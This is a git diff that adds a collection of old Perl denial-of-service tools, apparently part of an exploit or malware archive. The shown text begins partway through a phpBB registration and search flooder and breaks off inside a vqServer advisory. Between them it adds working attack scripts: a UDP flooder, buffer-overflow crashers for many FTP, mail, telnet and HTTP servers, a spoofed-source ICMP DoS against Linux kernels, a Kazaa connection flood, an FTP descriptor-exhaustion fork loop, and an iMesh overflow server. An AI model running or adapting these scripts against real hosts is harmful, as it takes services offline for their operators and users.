+                                 Proto => "tcp",
+                                );
+die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
+
+## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
+print $sock "POST $pth"."profile.php HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
+print $sock "Referer: $host\n";
+print $sock "Accept-Language: en-us\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Accept-Encoding: gzip, deflate\n";
+print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
+print $sock "Connection: Keep-Alive\n";
+print $sock "Cache-Control: no-cache\n";
+print $sock "Content-Length: $lrg\n\n";
+print $sock "$postit\n";
+close($sock);
+
+## Print a "." for every loop
+syswrite STDOUT, ".";
+
+## Increment X in One for every Loop 
+$x++;
+}
+
+## If Type Is Equals To 2 or Search
+}
+elsif ($type == 2){
+
+## User Search Loop for 9999 loops (enough for Flood xDDDD)
+while($x != 9999)
+{
+## Final Search String to Send
+$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
+
+## Posit Length
+$lrg = length $postit;
+
+## Connect Socket with Variables Provided By User
+my $sock = new IO::Socket::INET (
+                                 PeerAddr => "$host",
+                                 PeerPort => "80",
+                                 Proto => "tcp",
+                                );
+die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
+
+## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
+print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
+print $sock "Referer: $host\n";
+print $sock "Accept-Language: en-us\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Accept-Encoding: gzip, deflate\n";
+print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
+print $sock "Connection: Keep-Alive\n";
+print $sock "Cache-Control: no-cache\n";
+print $sock "Content-Length: $lrg\n\n";
+print $sock "$postit\n";
+close($sock);
+
+## Print a "." for every loop
+syswrite STDOUT, ".";
+
+## Increment X in One for every Loop
+$x++;
+}
+}else{
+## STF??? What Do You Type
+	die "Option not Allowed O_o???\n";
+}
+
+# milw0rm.com [2005-06-22] 
\ No newline at end of file
diff --git a/Perl/DoS.Perl.BBDoS.c b/Perl/DoS.Perl.BBDoS.c
new file mode 100644
index 00000000..b92a7344
--- /dev/null
+++ b/Perl/DoS.Perl.BBDoS.c
@@ -0,0 +1,57 @@
+#####################################################
+# udp flood.
+#
+# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
+#
+# --/odix
+######################################################
+
+use Socket;
+
+$ARGC=@ARGV;
+
+if ($ARGC !=3) {
+ printf "$0 <ip> <port> <time>\n";
+ printf "if arg1/2 =0, randports/continous packets.\n";
+ exit(1);
+}
+
+my ($ip,$port,$size,$time);
+ $ip=$ARGV[0];
+ $port=$ARGV[1]; 
+ $time=$ARGV[2];
+
+socket(crazy, PF_INET, SOCK_DGRAM, 17);
+    $iaddr = inet_aton("$ip");
+
+printf "udp flood - KaN3\n";
+
+if ($ARGV[1] ==0 && $ARGV[2] ==0) {
+ goto randpackets;
+}
+if ($ARGV[1] !=0 && $ARGV[2] !=0) {
+ system("(sleep $time;killall -9 udp) &");
+ goto packets;
+}
+if ($ARGV[1] !=0 && $ARGV[2] ==0) {
+ goto packets;
+}
+if ($ARGV[1] ==0 && $ARGV[2] !=0) {
+ system("(sleep $time;killall -9 udp) &"); 
+ goto randpackets;
+}
+
+packets:
+for (;;) {
+ $size=$rand x $rand x $rand;
+ send(crazy, 0, $size, sockaddr_in($port, $iaddr));
+} 
+
+randpackets:
+for (;;) {
+ $size=$rand x $rand x $rand;
+ $port=int(rand 65000) +1;
+ send(crazy, 0, $size, sockaddr_in($port, $iaddr));
+}
+
+
diff --git a/Perl/DoS.Perl.Chopsui b/Perl/DoS.Perl.Chopsui
new file mode 100644
index 00000000..ecafb7e0
--- /dev/null
+++ b/Perl/DoS.Perl.Chopsui
@@ -0,0 +1,38 @@
+#
+# Argosoft Mail Server 1.0.0.2 DoS
+# Chopsui-cide[MmM] 2000
+#
+# ----------------------------------------------------------
+# Disclaimer: this file is intended as proof of concept, and
+# is not intended to be used for illegal purposes. I accept
+# no responsibility for damage incurred by the use of it.
+# ----------------------------------------------------------
+#
+# This will cause Argosoft Mail Server 1.0.0.2 to page fault if the finger
+# daemon is running.
+#
+
+use IO::Socket;
+
+$host = "tr" ;
+$port = "79";
+
+$count = 0;
+$sod = "";
+$len = 3000;
+while($count < $len) {
+        $sod .= "X";
+        $count += 1;
+}
+$sod .= "\@X";
+$count = 0;
+while($count < 5) {
+print "Connecting to $host:$port...";
+$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";
+print "done.\n";
+print $socket "$sod\x0a";
+sleep(5);
+close($socket);
+$count += 1;
+}
+
diff --git a/Perl/DoS.Perl.Fusion b/Perl/DoS.Perl.Fusion
new file mode 100644
index 00000000..7f302d9f
--- /dev/null
+++ b/Perl/DoS.Perl.Fusion
@@ -0,0 +1,43 @@
+
+# Example for a possible DOS-attack against Byte Fusion Telnet.
+# There need to be 3090 characters to overflow Server.
+# Example : Trying example.com...
+# 	    Connected to example.com.
+# 	    Escape character is '^]'.
+#	    Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation
+#           Unregistered Evaluation. See www.bytefusion.com/telnet.html
+#            (Machine name) Login: [more then 3090 characters]
+#	    Overflow
+
+use IO::Socket;
+
+print "Possible DOS-attack against Byte Fusion Telnet\n";
+print "++++++++++++++++++++++++++++++++++++++++++++++\n";
+
+if (not $ARGV[0]) {
+  print "Usage: $0 [host]\n\n";
+  exit(0);
+}
+
+sub connecthost {
+        $host = IO::Socket::INET->new ( Proto => "tcp",
+			                PeerAddr => $ARGV[0],
+                			PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n";
+        $host->autoflush(1);
+} 
+
+$bufferoverflow .= "A" x 3090;
+
+print "\nOpen connection...\n";
+&connecthost; 
+print "Sending characters...\n";
+print $host "$bufferoverflow\n";
+print "close connection...\n";
+close $host;
+
+print "\nTesting...\n";
+&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
+close $host;
+die "The host $ARGV[0] is not vulnerable to this attack.\n";
+
+# by arbon(arbon@gmx.de)
\ No newline at end of file
diff --git a/Perl/DoS.Perl.Httux b/Perl/DoS.Perl.Httux
new file mode 100644
index 00000000..93b5c4a0
--- /dev/null
+++ b/Perl/DoS.Perl.Httux
@@ -0,0 +1,44 @@
+use IO::Socket;
+
+#USE .                                          
+#./tuxDOS.pl www.some.com.mx 80
+#TUX HTTPD Denial of Service for RedHat 7.2 
+#hecho por malcom-x 
+#cantact : malcomX@antisocial.com
+#####################################################################
+
+
+if(@ARGV == 2){
+    my $host = $ARGV[0];
+    my $port = $ARGV[1];
+    $EOL = "\015\012";
+    $BLANK = $EOL x 2;
+    #you can increment num of request in $sm change this value -> 6000 <-, for enlarge host.
+    $sm = A x 6000;  
+   
+    $sock = IO::Socket::INET->new(PeerAddr => $host,
+				  PeerPort => "$port",
+				  Proto => 'tcp');
+    unless($sock){
+        die "jeje Not  vulnerable try later.";
+	}
+    $sock->autoflush(1);
+    
+    print $sock "GET / HTTP/1.0\nAccept: */*\nHost: ". $sm ."\n" .$BLANK;
+    while ( <$sock> ){ 
+	print; 
+    }
+
+    close $sock;
+   }else{
+    print "[Usage]...\n./tuxDOS.pl 'HosT' [port] \n";
+}
+
+
+
+
+
+
+
+
+
diff --git a/Perl/DoS.Perl.Imesh.102 b/Perl/DoS.Perl.Imesh.102
new file mode 100644
index 00000000..f3c7b629
--- /dev/null
+++ b/Perl/DoS.Perl.Imesh.102
@@ -0,0 +1,57 @@
+#
+# iMesh 1.02 vulnerability
+# Chopsui-cide[MmM] 2000
+# http://midgets.box.sk/
+#
+# ----------------------------------------------------------
+# Disclaimer: this file is intended as proof of concept, and
+# is not intended to be used for illegal purposes. I accept
+# no responsibility for damage incurred by the use of it.
+# ----------------------------------------------------------
+#
+# A buffer overflow exists in iMesh 1.02 that allows the execution
+# of arbitrary code. When the iMesh client connects to a server,
+# the server is able to exploit the vulnerability and execute
+# arbitrary code on the system the client is running on.
+#
+
+use IO::Socket;
+
+$localhost = "localhost";
+$port = "5000";
+
+# Dummy payload
+$payload = "";
+$c = 0;
+while($c < 0x1aa) {
+    $payload .= "\x90";
+    $c += 1;
+};
+$payload .= "\xcc"; # raise exception 03h
+
+$es = "";
+$c = 0;
+while($c < 0x2723) {
+    $es .= "\x90";
+    $c += 1;
+};
+$es .= "\x43\x04\x43\x00";
+$c = 0;
+while($c < 12) {
+    $es .= "\x90";
+    $c += 1;
+};
+$es .= $payload;
+
+#print "$es";
+
+$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket
+.\n";
+print "waiting for connection on port $port...";
+$accsock = $lsock->accept();
+print "connected.\n";
+print $accsock "$es";
+sleep(5);
+close($accsock);
+close($lsock);
+
diff --git a/Perl/DoS.Perl.Meteor.a b/Perl/DoS.Perl.Meteor.a
new file mode 100644
index 00000000..9ef4fea1
--- /dev/null
+++ b/Perl/DoS.Perl.Meteor.a
@@ -0,0 +1,31 @@
+#
+# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
+#
+# A vulnerability has been identified in Meteor FTP Version 1.5, which
+# allows malicious users to remotely crash the ftpd. By connecting to the 
+# ftpd and issuing USER followed by large amounts of data, the server 
+# crashes. For more info, go to : 
+# http://www.evicted.org/projects/writings/mftpadvisory.txt
+# 
+# Usage : ./meteordos.pl <host/ip>
+#
+# Vulnerability & code by zerash
+# Contact : zerash@evicted.org
+
+use Net::FTP;
+$host = $ARGV[0];
+
+if("$ARGV[0]" eq "") {
+	print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
+	die("Usage : ./meteorftpdos <host\/ip>\n");
+} else {	
+	
+	print("Connecting to $host...\n");
+	my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
+	print("Connected!\n");
+	print("Attempting to exploit the ftpd...");
+	$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
+	$ftp->quit;
+	print("Success!\n");
+}
+
diff --git a/Perl/DoS.Perl.Nertt b/Perl/DoS.Perl.Nertt
new file mode 100644
index 00000000..7ca25b8d
--- /dev/null
+++ b/Perl/DoS.Perl.Nertt
@@ -0,0 +1,29 @@
+#
+# Jon Hittner
+# Raise the memory size for omnilnet until Windows NT crashes
+# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
+# Probably needs to be run several times to crash the system depending
+# on the amount of memory in the system.
+# This code was written to demo a problem, and I take no respoablity on how
+# it's used
+
+use strict; use Socket;
+
+my($y,$h,$p,$in_addr,$proto,$addr);
+
+$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]);
+if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; }
+
+$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
+$proto = getprotobyname('tcp');
+print "TESTING: $h:$p\n";
+for ($y=1 ; $y<2500000 ; $y++) {
+	socket(S, AF_INET, SOCK_STREAM, $proto);
+	connect(S,$addr) or next;
+	select S;
+	$| = 1;
+	select STDOUT;
+	send S,"OMNIBACK HAS SOME BIG ISSUES",0;
+	}
+print "ATTACK COMPLETED!\n";
+
diff --git a/Perl/DoS.Perl.Proxometron.a b/Perl/DoS.Perl.Proxometron.a
new file mode 100644
index 00000000..9aa0f2b1
--- /dev/null
+++ b/Perl/DoS.Perl.Proxometron.a
@@ -0,0 +1,34 @@
+#####################################################
+#  Proxomitron - Universial Web Filter - Version 3  #
+#  Dos Attack.                                      #
+#####################################################
+
+use IO::Socket;
+
+$ARGC=@ARGV;
+if ($ARGC !=2) {
+	print "\n-->";
+        print "\tUsage: perl dos-prox.pl <host> <port>\n";
+	exit;
+}
+
+$vic     = $ARGV[0];          # There IP
+$Uport   = $ARGV[1];          # There Web Port
+$SendStr = "GET /" x 1000;    # Crash String
+
+print "\n-->";
+print "\tCrashing:$vic on:$Uport\n";
+unless ($socket2 = IO::Socket::INET->new (Proto => "TCP",
+					  PeerAddr => $vic,
+					  PeerPort => $Uport))
+{
+        print "-->";
+        print "\tConnection Failed, Stoping.\n";
+        exit;
+}
+print $socket2 "GET $SendStr\n";
+close $socket2;
+
+print "-->";
+print "\tCrashed:$vic\n";
+exit;
\ No newline at end of file
diff --git a/Perl/DoS.Perl.Raden b/Perl/DoS.Perl.Raden
new file mode 100644
index 00000000..74683089
--- /dev/null
+++ b/Perl/DoS.Perl.Raden
@@ -0,0 +1,79 @@
+Who has more free file descriptors & network ports, you or the ftp server ?
+
+ftpd's which limit connections to 1 per user@host or similar may have some
+defense against this, or if they don't support multiple data connections
+open at the same time.  I suspect "many" is the number of ftpd's which are
+vulnderable to this attack so I've made no attempt (except in one case) to
+contact vendors because there are just too many damn vendors, not to mention
+ftpd's!  But basically, if the other end has, on average, maximum fd limit
+at 63, allows 50 connections, that's 3000 open fd's.  I'm not sure how many
+ftpd's are setup with that many open files as a part of the sytem, but not
+many, I suspect.
+
+No apologies for using perl(5), I just wanted a quick prototype.  It's not
+perfect but then I did't want to spend too much time on this.
+
+to ftpd maintainers:
+I don't know of any ftp clients which make use of this feature (multiple
+data channels supported concurrently) as the original ftp clients were all
+line-based and only suported one transfer at a time.  Maybe this is
+reasonable, but it would be a shame for the default defense to this attack
+to mean you can't use FTP to it's full potential (i.e. start a transfer
+from the current session but keep using the current `login' session, maybe
+to start other transfers, as requried).  Triming the number of concurrent
+data sessions to a maximum of 1-5 (by default) would probably be enough,
+with the capability to set this higher/lower as required.
+
+Darren
+
+
+
+$DOS_HOST="localhost";
+
+use IO::Socket;
+
+$pid = $$;
+$num = 0;
+
+while (1) {
+    while (fork) {
+        $sock = IO::Socket::INET->new(
+            Proto    => "tcp",
+            PeerAddr => $DOS_HOST,
+            PeerPort => "ftp(21)",
+        );
+
+        if (!$sock) {
+            print "connect failed!\n";
+            waitpid -1,0;
+        }
+
+
+        while (<$sock>) {
+            print;
+            print $sock "USER anonymous\r\n" if (/^220 .*/);
+            print $sock "PASS root@\r\n" if (/^331 .*/);
+            print $sock "PASV\r\n" if (/^230 .*/);
+
+            if (/^227 .*/) {
+                $remote = $_;
+                $remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;
+                @bits = split(/,/, $remote);
+                if ($#bits eq 5) {
+                    $remport = $bits[4] * 256 + $bits[5];
+                    $#bits = 3;
+                    $remip = join('.', @bits);
+                    $foo[$num++] = IO::Socket::INET->new(
+                            Proto => "tcp",
+                            PeerAddr => $remip,
+                            PeerPort => "($remport)");
+                }
+                print $sock "PASV\r\n";
+            }
+            last if (/^530 .*/);
+        }
+        waitpid -1,0;
+    }
+    sleep(5);
+}
+
diff --git a/Perl/DoS.Perl.Shafolder b/Perl/DoS.Perl.Shafolder
new file mode 100644
index 00000000..19260fe7
--- /dev/null
+++ b/Perl/DoS.Perl.Shafolder
@@ -0,0 +1,57 @@
+#
+#Kazaa/Morpheus Denial of Service Attack
+#Coded by Paul Godfrey
+#PaulG@Crackdealer.com
+#
+#Problem:  Both Kazaa and Morpheus filesharing applications have "backdoors"
+#which allow anonymous file access to their shared folder.  What does this have
+#to do with Denial of Service?  Unlike connections made from other users
+#of the applications, the number of connections to the backdoor cannot be
+#regulated or detected by the client.  This obviously will allow us to flood the
+#server with requests and therefore use up all of the available bandwidth.
+#Also due to the fact that most users have setup their firewall privileges so
+#that Kazaa or Morpheus is allowed access to open connections to outside sources
+#this attack will bypass most personal firewall clients such as Zone Alarm.
+#
+#Enjoy.
+#
+#Usage: ./km.pl -h victimip
+
+use Socket; 
+use Getopt::Std; 
+
+getopts("h:", \%args); 
+
+print("\nK/M Denial of Service\n"); 
+if (!defined $args{h}) { 
+print("Usage: km.pl -h victimip\n\n"); 
+exit; } 
+
+$host = $args{h}; 
+$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?"); 
+
+$trash="A"x100;
+
+&exec_cmd($command); 
+
+sub exec_cmd { 
+for($count=1;$count<=1000;$count++)
+{
+sendraw("GET /\"$trash\" HTTP/1.0\n\n");
+print("|");
+}
+print("\nData Sent.\n\n"); 
+} 
+
+sub sendraw { 
+my ($pstr)=@_; 
+socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || 
+die("Socket problems\n"); 
+if(connect(S,pack "SnA4x8",2,1214,$target)){ 
+my @in; 
+select(S); $|=1; print $pstr; 
+while(< S >){ push @in, $_; 
+print STDOUT "." if(defined $args{X});} 
+select(STDOUT); close(S); return @in; 
+} else { die("Can't connect...\n"); } 
+} 
diff --git a/Perl/DoS.Perl.Small.a b/Perl/DoS.Perl.Small.a
new file mode 100644
index 00000000..74efb38e
--- /dev/null
+++ b/Perl/DoS.Perl.Small.a
@@ -0,0 +1,49 @@
+# **************************************************************
+# DoS for Linux kernels from 2.2.7 to 2.2.9 reported in BUGTRAQ
+# 06/01/99 by Piotr Wilkin <pwl@wotan.2slo.wav.pl>
+# An attacker has to be in same ethernet segment with victim 
+# I did't test it 
+# coded by misteri0 from P.A.T.C.H.
+# Requires Net-RawIP-0.09 included in this directory
+# Edited for use with toast by Gridmark
+# **************************************************************
+$| = 1;
+require 'getopts.pl';
+use Net::RawIP;
+Getopts('t:');
+die " misteri0\@unet from P.A.T.C.H.\n Usage $0 -t <target>" unless
+$opt_t;
+srand(time);
+$i = 996;
+$data .= chr(int rand(255)),$i-- while($i); 
+
+$icmp = new Net::RawIP({
+                        ip => {
+                                 ihl => 6,
+			         tot_len => 1024,
+			         id => 1,
+			         ttl => 255,
+			         frag_off => 0,
+			         daddr => $opt_t
+                               },
+			icmp => { 
+			         id => 2650, 
+				 data => $data 
+				}
+		       });
+		       
+ $j++;
+ $icmp->set({
+            ip => { saddr => 17000000 + int rand 4261000000 },
+            icmp => { 
+	             type => int rand(14),
+	             code => int rand(10),
+		     sequence => int rand(255)
+	            }                                           
+          });
+ $icmp->send;
+  print "Linux-DoS sent...\n"
+# print "[b00m] " unless $j%1000;	  
+
+
+
diff --git a/Perl/DoS.Perl.Tedla b/Perl/DoS.Perl.Tedla
new file mode 100644
index 00000000..1969e3cb
--- /dev/null
+++ b/Perl/DoS.Perl.Tedla
@@ -0,0 +1,240 @@
+#####################################################################
+# Rewted Network Security Labs - www.rewted.org                     #
+# based upon advisories by USSR (www.ussrback.com) & Rewted.org	    #
+#								    #
+# Demonstration script to remotely overflow various server buffers, #
+# resulting in a denial of service, for TESTING purposes only.	    #
+# Runs on *nix & Windows with perl.				    #
+#								    #
+# G6 FTP Server          v2.0 beta4/5				    #
+# MDaemon httpd Server   v2.8.5.0				    #
+# Avirt Mail Server      v3.5					    #
+# BisonWare FTP Server   v3.5					    #
+# Vermillion FTP Server  v1.23					    #
+# ZetaMail POP3 Server   v2.1					    #
+# WFTPD FTP Server       2.40					    #
+# BFTelnet Server        v1.1					    #
+# Broker FTP Server      v3.5				            #
+# ExpressFS  FTP server  v2.x					    #
+# XtraMail POP3 Server   v1.11					    #
+# Cmail SMTP Server      v2.4	                                    #
+# PakMail SMTP/POP3	 v1.25			                    #
+#								    #
+# slackette - warminx@null.rewted.org				    #
+# www.rewted.org www.rewted.org www.rewted.org www.rewted.org 	    #
+#####################################################################
+
+use IO::Socket;
+use Getopt::Std;
+getopts('h:p:t:u:v', \%args);
+if(!defined($args{h}) && !defined($args{t})) { 
+print  qq~Usage:    $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v
+
+	-h victim to test remote overflow DoS on
+	-t server type (check the -v option for list)
+	-u username authorisation (required if server prompts for username)
+	-p password authentication (required if user/passwd is expected)
+	-v lists all servers vulnerable to each DoS
+
+~; exit; }
+
+if(defined($args{u})) { $user=$args{u}; }
+if(defined($args{p})) { $pass=$args{p}; }
+if(defined($args{v})) { &vulnerable; }
+if(defined($args{h}) && defined($args{t})){
+if(($args{t}) == 1)  { &G6;         }
+if(($args{t}) == 2)  { &mdaemon;    }
+if(($args{t}) == 3)  { &avirt;      }
+if(($args{t}) == 4)  { &bisonware;  }
+if(($args{t}) == 5)  { &vermillion; }
+if(($args{t}) == 6)  { &zetamail;   }
+if(($args{t}) == 7)  { &wftpd;      }
+if(($args{t}) == 8)  { &bftelnet;   } 
+if(($args{t}) == 9)  { &broker;     } 
+if(($args{t}) == 10) { &expressfs;  } 
+if(($args{t}) == 11) { &xtramail;   }
+if(($args{t}) == 12) { &cmail;      }
+if(($args{t}) == 13) { &pakmail;    } 
+if(($args{t}) == 14) { &pakpop;     }}
+
+sub G6 { 
+$denial .= "A" x 2000;
+$victim=$args{h};
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+				  	 PeerAddr => $victim,
+				  	 PeerPort => "21") or die "Can't connect.\n";
+	$socket->autoflush(1);
+print $socket "$denial\n"; # user
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub mdaemon {
+$victim=$args{h};
+$denial .= "A" x 1025;
+$url = "/$denial";
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "80") or die "Can't connect.\n";
+print $socket "GET $url\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub avirt { 
+$victim=$args{h};
+$denial .= "A" x 856;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+			                 PeerAddr => $victim,
+                			 PeerPort => "25") or die "Can't connect\n";
+        $socket->autoflush(1);
+print $socket "user $user\n";
+print $socket "pass $denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub bisonware {
+$victim=$args{h};
+$denial .= "A" x 2000;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+			                 PeerAddr => $victim,
+                			 PeerPort => "21") or die "Can't connect\n";
+        $socket->autoflush(1);
+print $socket "$denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub vermillion {
+$victim=$args{h};
+$denial .= "A" x 504;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+			                 PeerAddr => $victim,
+                			 PeerPort => "21") or die "Can't connect\n";
+        $socket->autoflush(1);
+print $socket "$user\n";
+print $socket "$pass\n";
+print $socket "cwd $denial\n";
+# for(i=0; i<=3; i++) { print $socket "CWD $denial\n"; }
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub zetamail {
+$victim=$args{h};
+$denial .= "A" x 3500;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "110") or die "Can't connect.\n";
+print $socket "user $denial\n"; 
+print $socket "pass $denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub wftpd {
+$victim=$args{h};
+$denial .= "A" x 255;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "21") or die "Can't connect.\n";
+print $socket "$user\n";
+print $socket "$pass\n";
+print $socket "MKDIR $denial\n";
+print $socket "CWD $denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub bftelnet {
+# use Net::Telnet;
+$victim=$args{h};
+$denial .= "A" x 3090;
+$telnet = new Net::Telnet ( Timeout =>10,
+			    Errmode =>'die');
+$telnet->open('$victim');
+$telnet->waitfor('/Login: $/i');
+$telnet->print('$denial');
+print "\nSent overflow to $victim\n";
+close $telnet; }
+
+sub broker {
+$victim=$args{h};
+$denial .= "A" x 2730;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+			                 PeerAddr => $victim,
+                			 PeerPort => "21") or die "Can't connect.\n";
+print $socket "$denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+
+sub expressfs {
+$victim=$args{h};
+$denial .= "A" x 654;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+			                 PeerAddr => $victim,
+                			 PeerPort => "21") or die "Can't connect.\n";
+print $socket "$denial\n";
+print $socket "AAAAAAAAAAAAAAAAAAA\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub xtramail {
+$victim=$args{h};
+$denial .= "A" x 2930;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "25") or die "Can't connect.\n";
+print $socket "MAIL FROM: test\@localhost\n";
+print $socket "RCPT TO: $denial\@localhost\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub cmail {
+$victim=$args{h};
+$denial .= "A" x 7090;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "25") or die "Can't connect.\n";
+print $socket "MAIL FROM: $denial\@localhost\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub pakmail {
+$victim=$args{h};
+$denial .= "A" x 1390;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "25") or die "Can't connect.\n";
+print $socket "MAIL FROM: test\@localhost\n";
+print $socket "RCPT TO: $denial\@localhost\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub pakpop {
+$victim=$args{h};
+$denial .= "A" x 1400;
+	$socket = IO::Socket::INET->new (Proto => "tcp",
+					 PeerAddr => $victim,
+					 PeerPort => "110") or die "Can't connect.\n";
+print $socket "user test\n";
+print $socket "pass $denial\n";
+print "\nSent overflow to $victim\n";
+close $socket; }
+
+sub vulnerable {
+print qq~
+ ______________________________________________________________________________
+    Vulnerable Daemon        Version         Vulnerable Daemon         Version
+ ______________________________________________________________________________
+
+ [1] G6 FTP Server           v2.0b4/5     [2] MDaemon httpd Server     v2.8.5.0
+
+ [3] Avirt Mail Server       v3.5         [4] BisonWare FTP Server     v3.5
+
+ [5] Vermillion FTP Server   v1.23        [6] ZetaMail SMTP Server     v2.1
+
+ [7] WFTPD FTP Server        v2.40        [8] BFTelnet Server          v1.1
+
+ [9] Broker FTP Server       v3.5        [10] ExpressFS FTP Server     v2.x 
+
+[11] XtraMail POP3 Server    v1.11       [12] Cmail SMTP Server        v2.4
+
+[13] PakMail SMTP Server     v1.25       [14] PakMail POP3 Server      v1.25
+
+~; exit; }
\ No newline at end of file
diff --git a/Perl/DoS.Perl.Vftp b/Perl/DoS.Perl.Vftp
new file mode 100644
index 00000000..ee0c43be
--- /dev/null
+++ b/Perl/DoS.Perl.Vftp
@@ -0,0 +1,50 @@
+
+# Example for a possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23.
+# There need to be 504 characters to overflow Server.
+# Example : Trying example.com...
+# 	    Connected to example.com.
+# 	    Escape character is '^]'.
+#	    220 itsme FTP Server (vftpd 1.23) ready.
+#           USER itsme
+#           PASS ******
+#           CWD [504 characters]
+#           CWD [504 characters]
+#           CWD [504 characters]
+#	    Overflow
+
+use IO::Socket;
+
+print "Possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23\n";
+print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+
+if (not $ARGV[2]) {
+  print "Usage: $0 [host] [user] [pass]\n\n";
+  exit(0);
+}
+
+sub connecthost {
+        $host = IO::Socket::INET->new ( Proto => "tcp",
+			                PeerAddr => $ARGV[0],
+                			PeerPort => "21",) or die "Can't open connection to $ARGV[0] because $!\n";
+        $host->autoflush(1);
+} 
+
+$bufferoverflow .= "A" x 504;
+
+print "\nOpen connection...\n";
+&connecthost;
+print "Sending characters...\n";
+print $host "user $ARGV[1]\n";
+print $host "pass $ARGV[2]\n";
+print $host "cwd $bufferoverflow\n";
+print $host "cwd $bufferoverflow\n";
+print $host "cwd $bufferoverflow\n";
+print "close connection...\n";
+close $host;
+
+print "\nTesting...\n";
+&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
+close $host;
+die "The host $ARGV[0] is not vulnerable to this attack.\n";
+
+# by arbon(arbon@gmx.de)
diff --git a/Perl/DoS.Perl.Vqserver b/Perl/DoS.Perl.Vqserver
new file mode 100644
index 00000000..33df7cc5
--- /dev/null
+++ b/Perl/DoS.Perl.Vqserver
@@ -0,0 +1,71 @@
+DHC Advisory
+Advisory for vqServer 1.4.49
+vqServer is made by vqSoft. Site: http://www.vqsoft.com
+by nemesystm of the DHC
+(http://dhcorp.cjb.net - auto45040@hushmail.com)
+
+/-|=[explaination]=|-\
+When sending vqServer version 1.4.49 a malformed URL request it will crash 
+the service. This has been verified to work on the Windows version, but 
